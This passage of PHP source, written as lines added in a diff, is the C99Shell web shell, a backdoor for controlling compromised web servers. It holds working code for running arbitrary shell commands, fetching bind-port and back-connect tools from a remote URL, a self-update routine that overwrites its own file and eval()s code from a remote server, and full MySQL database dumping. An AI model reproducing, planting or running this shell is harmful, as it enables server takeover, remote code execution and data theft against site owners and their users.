DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return FALSE;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + $ret = TRUE; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= 
DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return FALSE;} + } + else {return FALSE;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return FALSE;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 
0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; 
$w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} + elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} + else {return "<font color=green>".view_perms(fileperms($o))."</font>";} +} +} +if (!function_exists("c99getsource")) +{ +function c99getsource($fn) +{ + global $c99sh_sourcesurl; + $array = array( + "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", + "c99sh_bindport.c" => "c99sh_bindport_c.txt", + "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", + "c99sh_backconn.c" => "c99sh_backconn_c.txt", + "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", + "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} + else {return FALSE;} +} +} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate($update = TRUE) +{ + $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; + $data = @file_get_contents($url); + if (!$data) {return "Can't connect to update-server!";} + else + { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") + { + $string = explode("\x01",$string); + if ($update) + { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return 
"Can't fetch update!";} + else + { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";} + else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} + else {return "Error in protocol: segmentation failed! (".$data.") ";} + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = TRUE;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = TRUE;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by C99Shell.SQL v. ".$shver." +# Home page: http://ccteam.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." 
+# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + 
mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>"; + if ($tbl_struct) + { + echo "<td valign=\"top\"><b>Fields:</b><br>"; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} + echo "</td></tr></table>"; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if 
(!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return FALSE;} +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== FALSE) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." 
";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function c99shexit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", FALSE); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = TRUE; + $hsafemode = "<font color=red>ON (secure)</font>"; +} +else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} +else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} +$sort = htmlspecialchars($sort); +if 
(empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - phpshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; 
background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. 
<?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} +$d = str_replace("\\\\","\\",$d); +$dispd = htmlspecialchars($d); +$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); +$i = 0; +foreach($pd as $b) +{ + $t = ""; + $j = 0; + foreach ($e as $r) + { + $t.= $r.DIRECTORY_SEPARATOR; + if ($j == $i) {break;} + $j++; + } + echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; + $i++; +} +echo "&nbsp;&nbsp;&nbsp;"; +if (is_writable($d)) +{ + $wd = TRUE; + $wdt = "<font color=green>[ ok ]</font>"; + echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; +} +else +{ + $wd = FALSE; + $wdt = "<font color=red>[ Read-Only ]</font>"; + echo "<b>".view_perms_color($d)."</b>"; +} +if (is_callable("disk_free_space")) +{ + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free === FALSE) {$free = 0;} + if ($total === FALSE) {$total = 0;} + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "<br><b>Free ".view_size($free)." of ".view_size($total)." 
(".$free_percent."%)</b>"; +} +echo "<br>"; +$letters = ""; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; + if ($letter.":" != $v) {$letters .= $letter;} + else {$letters .= "<font color=green>".$letter."</font>";} + $letters .= " ]</a> "; + } + } + if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; + } +} +echo "</p></td></tr></table><br>"; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} +echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) 
{$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php + if ($sql_server) + { + $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); + $err = mysql_smarterror(); + @mysql_select_db($sql_db,$sql_sock); + if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} + } + else {$sql_sock = FALSE;} + echo "<b>SQL Manager:</b><br>"; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = 
array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} + echo "</center>"; + } + echo "</td></tr><tr>"; + if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } + else + { + //Start left panel + if (!empty($sql_db)) + { + ?><td width="25%" height="100%" 
